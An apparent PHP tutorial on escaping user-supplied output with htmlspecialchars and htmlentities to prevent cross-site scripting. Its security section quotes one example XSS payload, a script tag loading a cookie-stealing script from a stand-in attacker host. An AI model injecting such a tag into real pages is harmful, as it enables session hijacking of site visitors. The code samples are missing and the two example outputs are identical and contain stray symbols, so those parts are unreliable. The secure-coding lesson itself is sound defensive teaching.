What is output escaping and why does it matter?

Any significant PHP application and even the simplest of websites accept input. When we speak of input, we're talking about input that is generated by users or external systems, which is then processed by our website or application. Some of that input might be stored in our database for later retrieval and output. It's when we output user generated input, input that we ourselves did not generate, that we should escape that data when outputting.

An example of input can be a contact form that is filled out by visitors to your website. The input from the contact form is validated and processed. At some future point in time, we might output/display what the user filled in on our contact form. It's at that time that we need to escape the output.

How to escape output in PHP

We can use the htmlspecialchars function to escape output:

The above output will display as:
Please <em>contact</em> me as §soon§ as possible.

Or we can use the htmlentities function to escape output:

The above output will display as:
Please <em>contact</em> me as §soon§ as possible.

Escape output

Certain characters have special meaning in HTML, using htmlspecialchars and htmlentities will preserve that meaning. htmlentities will encode all HTML characters, htmlspecialchars does not. You can see the full PHP documentation on htmlspecialchars and htmlentities for more information.

Output escaping security

Let's take a look at an example of how a Cross Site Scripting (XSS) attack might take place and where output escaping will prevent such an attack:

  • Consider an example of a forum where users post comments.
  • Comments are viewable by all users on the forum.
  • A user with malicious intent posts a comment that includes a script tag: <script src="http://hackersite.com/cookiehijack.js">
  • When any user views the posted comment, their cookie is stolen and sent to the malicious user.
  • The malicious user can now impersonate any user who's cookie was stolen

Escaping the output will prevent the malicious script from running! You can find more in on XSS.

When to escape output?

We escape output when the input we receive is from untrusted sources.

Key Takeaways

  • PHP makes the functions htmlspecialchars and htmlentities available for output escaping.
  • There are various libraries available for HTML sanitization.
  • In general we should escape all output received from untrusted sources.